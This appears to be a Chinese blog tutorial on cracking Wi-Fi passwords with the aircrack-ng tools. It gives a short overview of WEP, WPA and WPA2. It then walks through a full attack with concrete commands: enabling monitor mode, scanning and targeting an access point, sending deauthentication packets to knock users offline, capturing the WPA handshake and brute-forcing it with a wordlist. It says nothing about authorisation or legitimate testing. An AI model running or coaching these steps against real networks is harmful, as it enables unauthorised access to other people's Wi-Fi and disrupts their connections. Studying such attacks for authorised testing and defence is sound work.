1.简介
网线网络的机密方式:
wep 是 Wired Equivalent Privacy(有线等效保密)的英文缩写,目前常见的是 64 位 WEP 加密和 128 位 WEP加密。不安全的加密方式。
wpa 是 WEP 加密的改进版,包含两种方式:预共享密钥和 Radius 密钥(远程用户拨号认证系统)。其中预共享密钥(pre-share key 缩写为 PSK)有两种密码方式:TKIP 和 AES,而 RADIUS 密钥利用 RADIUS 服务器认证并可以动态选择 TKIP、AES、WEP 方式。相比 TKIP,AES 具有更好的安全系数,不容易被破解。
wpa2 即 WPA 加密的升级版。WPA2 同样也分为 TKIP 和 AES 两种方式,不容易被破解。
.破解流程
监听网卡–>搜索wifi–>查看wifi用户–>发大量数据包迫使用户其下线–>用户重登录抓取密码数据包–>字典爆破
3.用 airmon-ng 将网卡设置为监听模式
可以在开启前执行 airmon-ng check kill,自动检查冲突程序并强制关闭
airmon-ng start wlan0
要想关掉的话
airmon-ng stop wlan0mon
4.用 airodump-ng 获取附近能搜到的无线网络
airodump-ng wlan0mon
BSSID(Basic Service SetIdentifier): AP 的 MAC 地址。
PWR(Power): 信号强度。
Beacons: AP 发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒会发送 10 个左右的 beacon,
所以它们能在很远的地方就被发现。
#Data:当前数据传输量。
#/s:过去 10 秒钟内每秒捕获数据分组的数量。
CH(Channel): AP 所在的频道。
MB: AP 的最大传输速度。MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g。后面带.的表
示短封包标头,处理速度快,更利于破解。
ENC(Encryption): 使用的加密算法体系。
CIPHER: 检测到的加密算法。#这个和 ENC 的区别我确实不明白,有没有知道的朋友可以告诉我。
AUTH(Authority): 认证方式。
ESSID(The Extended Service Set Identifier): AP 的名称。
5.用 airodump-ng 对选择好的目标进行抓包
airodump-ng --bssid BSSID地址 -c CH信息 -w 文件位置/保存数据名 wlan0mon
--bssid 是无线网络的 mac 地址
-c 是所在频道
-w 是握手包保存的位置
6.用 aireplay-ng 使客户端使其重新与路由器握手验证并截获握手包
aireplay-ng -0 20 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx w
-0 冲突攻击模式,后面跟发送次数,一般使用这个模式即可。
-a 无线网 mac 地址
-c 连接上的客户端 mac 地址,就是那个 STATION
用新的窗口
如果第一个窗口第一行出现 WPA handshake +地址。
7.用 aircrack-ng 对握手包进行破解
aircrack-ng -w 字典路径 握手包路径
字典足够好,有那个密码才能得到结果。
9423
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
